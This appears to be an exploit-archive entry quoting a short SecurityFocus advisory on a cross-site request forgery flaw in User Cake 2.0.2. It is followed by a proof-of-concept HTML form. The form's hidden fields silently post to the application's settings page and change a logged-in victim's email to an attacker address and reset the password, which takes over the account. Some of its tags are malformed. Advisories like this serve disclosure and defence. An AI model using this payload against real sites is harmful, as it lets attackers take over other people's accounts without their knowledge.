source: https://www.securityfocus.com/bid/67604/info
User Cake is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
User Cake 2.0.2is vulnerable; prior versions may also be affected.<html><! -- CSRF Example for userCake --><div align="center"><pre><h2><b> userCake CSRF Proof of concept <b></h2><h4> Prerequisite: Make sure the user is logged in to the forum before submitting </h4><body><form
action="http://usercake.com/user_settings.php"
method="POST">
Enter <u>CSRFTest</u> user account password to continue...
Username:<b>CSRFTest</b>
Password:<inputtype="password" name="password" size="10" required><inputtype="hidden" name="email" value="attacker@email.com"/><inputtype="hidden" name="passwordc" value="HelloWorld"/><inputtype="hidden" name="passwordcheck" value="HelloWorld"/><inputtype="submit" name="submit" value="Submit"/></form></body></div></html>
